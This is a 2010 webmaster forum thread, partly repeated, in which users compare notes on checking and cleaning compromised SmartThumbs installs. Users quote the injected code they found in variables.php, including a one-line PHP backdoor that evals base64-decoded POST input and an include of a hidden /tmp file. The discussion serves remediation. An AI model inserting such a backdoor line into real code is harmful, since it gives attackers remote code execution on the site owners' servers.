checking and removing ST exploit

MMarko · May 8th, 2010, 07:36 AM

I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

Porn X Space 4 Webmasters Blog Archive Remove SmartThumbs exploit in 5 steps

FrozenJag · May 8th, 2010, 07:50 AM

Dude.

Thank you so much for this. I'm pretty sure mine are good but now I can be 100%

I appreciate it!

boneless · May 8th, 2010, 08:14 AM

yellowfiber is checking for me as i did find those lines in there, they just tried to include a different file called webcams.tmp

MMarko · May 8th, 2010, 09:03 AM

Once those are gone you will see increase in traffic for sure...

Shoplifter · May 8th, 2010, 09:48 PM

I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?

smoothballs · May 9th, 2010, 04:33 AM

where exactly do you look to see if you have the exploit? I know I have tgps that need updating to latest version but evertime I do this my files get chmod to 777 when it needs to be 755 with my hosts, so have to change permissions all over again!

Basically I don't want to run something that was not needed in the first place if there is no exploit, cos knowing my luck I will mess it up! lol

nation-x · May 9th, 2010, 07:38 AM

I haven't found any .tmp files... but I did find that @eval code in a bunch of my sites variables.php

MMarko · May 9th, 2010, 12:06 PM

Quote:

Originally Posted by smoothballs

where exactly do you look to see if you have the exploit?

just open in text editor file st/admin/variables.php

MMarko · May 9th, 2010, 12:07 PM

Quote:

Originally Posted by Shoplifter

I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?

I guess they skimmed under 10% percent of clicks...

JefersoN · May 9th, 2010, 12:15 PM

hello, I just found this on one of my ST varaiables
is this include normal?

@include_once('/tmp/ases.tmp');
if not, how can i remove all files?

blackrose · May 9th, 2010, 12:17 PM

that is not normal ... remove the line and delete the file then upgrade to latest version.

i also have that line only on my variables.php

Shoplifter · May 9th, 2010, 12:42 PM

Many thanks for this info MMarko...

In my case I had quite a few infected sites as I had not updated my ST since they put in the rewrite functions in June of 2009. My newer sites were not hit.

I found updating and then saving the general settings cleaned the variables.php file. I checked a few databases after with PHPMyAdmin and the niche columns were ok, so I am thinking the upgrade clears this too. I deleted the .tmp files by hand. In my case the .tmp files had quite a few different names but were always 4 characters long.

smoothballs · May 9th, 2010, 01:21 PM

Quote:

Originally Posted by MMarko

just open in text editor file st/admin/variables.php

yeah thats what I started doing after reading nation x post

so far so good

Cheers

Dan S · May 10th, 2010, 03:55 AM

Yikes, first time I have been affected too

FoZzI · May 10th, 2010, 04:28 AM

I dont have that "sesa.temp" but I have this one:

$niche='1';@eval(base64_decode($_POST[qxp]));//';

should that one line be deleted then ?

nation-x · May 10th, 2010, 06:05 AM

Quote:

Originally Posted by FoZzI

I dont have that "sesa.temp" but I have this one:

$niche='1';@eval(base64_decode($_POST[qxp]));//';

should that one line be deleted then ?

just this part

@eval(base64_decode($_POST[qxp]));//';

MMarko · May 10th, 2010, 03:35 PM

and you have to clean tables in database too! since ST is taking values for variables.php from table st_settings

cybermike · May 11th, 2010, 10:47 AM

shit found @include_once('/tmp/ases.tmp');

nation-x · May 11th, 2010, 11:41 AM

Quote:

Originally Posted by cybermike

shit found @include_once('/tmp/ases.tmp');

oy vey

blackrose · May 12th, 2010, 08:13 AM

look for this file as well...

/tmp/.ICE-unix/ases.tmp

May 8th, 2010, 07:36 AM	#1 (permalink)
MMarko dlxer.com Join Date: Dec 2007 Posts: 505	checking and removing ST exploit I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually... Porn X Space 4 Webmasters Blog Archive Remove SmartThumbs exploit in 5 steps __________________ dlXer - Adult design, coding and hosting. ST/STP, TradePulse

May 8th, 2010, 07:50 AM	#2 (permalink)
FrozenJag Hello. Join Date: Nov 2006 Location: US Posts: 5,502	Dude. Thank you so much for this. I'm pretty sure mine are good but now I can be 100% I appreciate it! __________________ I dont give a lovely mother fuck.

May 8th, 2010, 08:14 AM	#3 (permalink)
boneless Capo di tutti capi Join Date: Oct 2005 Location: Rotterdam Posts: 3,761	yellowfiber is checking for me as i did find those lines in there, they just tried to include a different file called webcams.tmp __________________ icq 14857306 skype dabone2

May 8th, 2010, 09:03 AM	#4 (permalink)
MMarko dlxer.com Join Date: Dec 2007 Posts: 505	Once those are gone you will see increase in traffic for sure... __________________ dlXer - Adult design, coding and hosting. ST/STP, TradePulse

May 8th, 2010, 09:48 PM	#5 (permalink)
Shoplifter Richest man in Babylon Join Date: Oct 2005 Posts: 579	I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit? __________________ Promote the #1 Filipina fetish site on the net. Now with CCBill, Segpay, Morphed Feeds and FHG's!. ICQ Me 88-05-05 for all info!

May 9th, 2010, 04:33 AM	#6 (permalink)
smoothballs Traffic Guru Join Date: Mar 2007 Posts: 345	where exactly do you look to see if you have the exploit? I know I have tgps that need updating to latest version but evertime I do this my files get chmod to 777 when it needs to be 755 with my hosts, so have to change permissions all over again! Basically I don't want to run something that was not needed in the first place if there is no exploit, cos knowing my luck I will mess it up! lol

May 9th, 2010, 07:38 AM	#7 (permalink)
nation-x LifestyleAmateurs.com Join Date: Oct 2005 Location: Rock Hill, SC Posts: 8,926	I haven't found any .tmp files... but I did find that @eval code in a bunch of my sites variables.php __________________ How about some Real Amateur Pussy $50 credited when you become an affiliate of ManicaMoney

May 9th, 2010, 12:15 PM	#10 (permalink)
JefersoN Traffic Guru Join Date: Mar 2007 Posts: 348	hello, I just found this on one of my ST varaiables is this include normal? @include_once('/tmp/ases.tmp'); if not, how can i remove all files? __________________ Looking for quality thumbs/text trades? 15k+? hit me up.. mature, MILF, shemale, BBW, interracial, big tits, bondage and general sites... Last edited by JefersoN; May 9th, 2010 at 12:18 PM.

May 9th, 2010, 12:17 PM	#11 (permalink)
blackrose Traffic Guru Join Date: Oct 2005 Posts: 263	that is not normal ... remove the line and delete the file then upgrade to latest version. i also have that line only on my variables.php

May 9th, 2010, 12:42 PM	#12 (permalink)
Shoplifter Richest man in Babylon Join Date: Oct 2005 Posts: 579	Many thanks for this info MMarko... In my case I had quite a few infected sites as I had not updated my ST since they put in the rewrite functions in June of 2009. My newer sites were not hit. I found updating and then saving the general settings cleaned the variables.php file. I checked a few databases after with PHPMyAdmin and the niche columns were ok, so I am thinking the upgrade clears this too. I deleted the .tmp files by hand. In my case the .tmp files had quite a few different names but were always 4 characters long. __________________ Promote the #1 Filipina fetish site on the net. Now with CCBill, Segpay, Morphed Feeds and FHG's!. ICQ Me 88-05-05 for all info!

May 10th, 2010, 03:55 AM	#14 (permalink)
Dan S Movie-Traffic.com Join Date: Oct 2005 Posts: 1,522	Yikes, first time I have been affected too __________________ Movie Traffic Trades

May 10th, 2010, 04:28 AM	#15 (permalink)
FoZzI Serious Contributor Join Date: Oct 2005 Location: Somewhere On Planet Earth Posts: 1,158	I dont have that "sesa.temp" but I have this one: $niche='1';@eval(base64_decode($_POST[qxp]));//'; should that one line be deleted then ? __________________ Wanna Make Money With Your Gay Traffic? HazeCash Works Well For Me Gay Porn

May 10th, 2010, 03:35 PM	#17 (permalink)
MMarko dlxer.com Join Date: Dec 2007 Posts: 505	and you have to clean tables in database too! since ST is taking values for variables.php from table st_settings __________________ dlXer - Adult design, coding and hosting. ST/STP, TradePulse

May 11th, 2010, 10:47 AM	#18 (permalink)
cybermike Serious Contributor Join Date: Sep 2006 Location: Ny Posts: 629	shit found @include_once('/tmp/ases.tmp'); __________________ Try Shinymovies.com and Shinyangels.com from Cashlantis.com!

May 12th, 2010, 08:13 AM	#20 (permalink)
blackrose Traffic Guru Join Date: Oct 2005 Posts: 263	look for this file as well... /tmp/.ICE-unix/ases.tmp